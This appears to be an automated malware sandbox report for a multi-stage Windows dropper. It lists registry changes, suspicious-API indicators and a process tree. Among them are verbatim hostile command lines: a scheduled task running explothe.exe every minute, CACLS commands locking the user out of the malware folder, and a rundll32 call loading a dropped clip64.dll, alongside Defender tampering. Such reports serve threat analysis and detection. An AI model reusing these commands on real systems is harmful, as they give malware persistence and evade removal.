Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

3tN34KJ.exeAppLaunch.exeExplorer.EXE

pid	process
4728	3tN34KJ.exe
4728	3tN34KJ.exe
3308	AppLaunch.exe
3308	AppLaunch.exe
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE
3268	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3268 Explorer.EXE
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

3tN34KJ.exetoolspub2.exe

pid process

4728 3tN34KJ.exe
7132 toolspub2.exe

pid	process
3268	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AppLaunch.exeExplorer.EXE6850.exekos4.exe

description	pid	process
Token: SeDebugPrivilege	3308	AppLaunch.exe
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeDebugPrivilege	6996	6850.exe
Token: SeDebugPrivilege	2316	kos4.exe
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE
Token: SeCreatePagefilePrivilege	3268	Explorer.EXE
Token: SeShutdownPrivilege	3268	Explorer.EXE

Suspicious use of FindShellTrayWindow 51 IoCs

Processes:

msedge.exe6DB0.exemsedge.exe

pid	process
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
7964	6DB0.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe
7964	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Broom.exe

pid process

7172 Broom.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3268 Explorer.EXE

pid	process
7172	Broom.exe

pid	process
3268	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NEAS.54bb47dd6eaec3055144b0f0a697ded0.exeZa8Eg64.exeim4Hk99.exere7CF15.exe1lZ15ax9.exe2qf9919.exe4dA559yM.exe5Vk1sX4.exeexplothe.execmd.exe

description	pid	process	target process
PID 4236 wrote to memory of 2560	4236	NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe	Za8Eg64.exe
PID 4236 wrote to memory of 2560	4236	NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe	Za8Eg64.exe
PID 4236 wrote to memory of 2560	4236	NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe	Za8Eg64.exe
PID 2560 wrote to memory of 4884	2560	Za8Eg64.exe	im4Hk99.exe
PID 2560 wrote to memory of 4884	2560	Za8Eg64.exe	im4Hk99.exe
PID 2560 wrote to memory of 4884	2560	Za8Eg64.exe	im4Hk99.exe
PID 4884 wrote to memory of 1360	4884	im4Hk99.exe	re7CF15.exe
PID 4884 wrote to memory of 1360	4884	im4Hk99.exe	re7CF15.exe
PID 4884 wrote to memory of 1360	4884	im4Hk99.exe	re7CF15.exe
PID 1360 wrote to memory of 2288	1360	re7CF15.exe	1lZ15ax9.exe
PID 1360 wrote to memory of 2288	1360	re7CF15.exe	1lZ15ax9.exe
PID 1360 wrote to memory of 2288	1360	re7CF15.exe	1lZ15ax9.exe
PID 2288 wrote to memory of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 2288 wrote to memory of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 2288 wrote to memory of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 2288 wrote to memory of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 2288 wrote to memory of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 2288 wrote to memory of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 2288 wrote to memory of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 2288 wrote to memory of 3308	2288	1lZ15ax9.exe	AppLaunch.exe
PID 1360 wrote to memory of 1668	1360	re7CF15.exe	2qf9919.exe
PID 1360 wrote to memory of 1668	1360	re7CF15.exe	2qf9919.exe
PID 1360 wrote to memory of 1668	1360	re7CF15.exe	2qf9919.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 1668 wrote to memory of 4160	1668	2qf9919.exe	AppLaunch.exe
PID 4884 wrote to memory of 4728	4884	im4Hk99.exe	3tN34KJ.exe
PID 4884 wrote to memory of 4728	4884	im4Hk99.exe	3tN34KJ.exe
PID 4884 wrote to memory of 4728	4884	im4Hk99.exe	3tN34KJ.exe
PID 2560 wrote to memory of 4424	2560	Za8Eg64.exe	4dA559yM.exe
PID 2560 wrote to memory of 4424	2560	Za8Eg64.exe	4dA559yM.exe
PID 2560 wrote to memory of 4424	2560	Za8Eg64.exe	4dA559yM.exe
PID 4424 wrote to memory of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4424 wrote to memory of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4424 wrote to memory of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4424 wrote to memory of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4424 wrote to memory of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4424 wrote to memory of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4424 wrote to memory of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4424 wrote to memory of 3564	4424	4dA559yM.exe	AppLaunch.exe
PID 4236 wrote to memory of 2156	4236	NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe	5Vk1sX4.exe
PID 4236 wrote to memory of 2156	4236	NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe	5Vk1sX4.exe
PID 4236 wrote to memory of 2156	4236	NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe	5Vk1sX4.exe
PID 2156 wrote to memory of 2404	2156	5Vk1sX4.exe	explothe.exe
PID 2156 wrote to memory of 2404	2156	5Vk1sX4.exe	explothe.exe
PID 2156 wrote to memory of 2404	2156	5Vk1sX4.exe	explothe.exe
PID 2404 wrote to memory of 3912	2404	explothe.exe	schtasks.exe
PID 2404 wrote to memory of 3912	2404	explothe.exe	schtasks.exe
PID 2404 wrote to memory of 3912	2404	explothe.exe	schtasks.exe
PID 2404 wrote to memory of 4404	2404	explothe.exe	cmd.exe
PID 2404 wrote to memory of 4404	2404	explothe.exe	cmd.exe
PID 2404 wrote to memory of 4404	2404	explothe.exe	cmd.exe
PID 4404 wrote to memory of 1824	4404	cmd.exe	cmd.exe
PID 4404 wrote to memory of 1824	4404	cmd.exe	cmd.exe
PID 4404 wrote to memory of 1824	4404	cmd.exe	cmd.exe
PID 4404 wrote to memory of 756	4404	cmd.exe	cacls.exe
PID 4404 wrote to memory of 756	4404	cmd.exe	cacls.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3268

C:\Users\Admin\AppData\Local\Temp\NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.54bb47dd6eaec3055144b0f0a697ded0.exe"
2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4236

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Za8Eg64.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Za8Eg64.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2560

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\im4Hk99.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\im4Hk99.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4884

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\re7CF15.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\re7CF15.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1360

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1lZ15ax9.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1lZ15ax9.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2qf9919.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2qf9919.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:4160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 540
8⤵
- Program crash
PID:4444

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3tN34KJ.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3tN34KJ.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4728

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4dA559yM.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4dA559yM.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4424

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:3564

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5Vk1sX4.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5Vk1sX4.exe
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2156

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
5⤵
- Creates scheduled task(s)
PID:3912

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
5⤵
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:1824

C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
6⤵
PID:756

C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
6⤵
PID:2240

C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
6⤵
PID:4572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:2336

C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
6⤵
PID:380

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
5⤵
- Loads dropped DLL
PID:5616

C:\Users\Admin\AppData\Local\Temp\3302.exe
C:\Users\Admin\AppData\Local\Temp\3302.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2676

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\to4xD9ej.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\to4xD9ej.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4588

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jz7Ey3Qk.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jz7Ey3Qk.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4048

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Fu3JA8ZY.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Fu3JA8ZY.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3608

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\uC0Ux4Gf.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\uC0Ux4Gf.exe
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2868

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ya80mj3.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ya80mj3.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
8⤵
PID:2176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 540
9⤵
- Program crash
PID:1824

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2it919bS.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2it919bS.exe
7⤵
- Executes dropped EXE
PID:2332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\34E7.bat" "
2⤵
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
3⤵
PID:2496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:4128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,887824188101225716,13707488114136766383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1716 /prefetch:3
4⤵
PID:6268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,887824188101225716,13707488114136766383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1968 /prefetch:2
4⤵
PID:6164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
3⤵
PID:4728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:2056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,18045083208915431315,7075146140349824465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
4⤵
PID:5672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
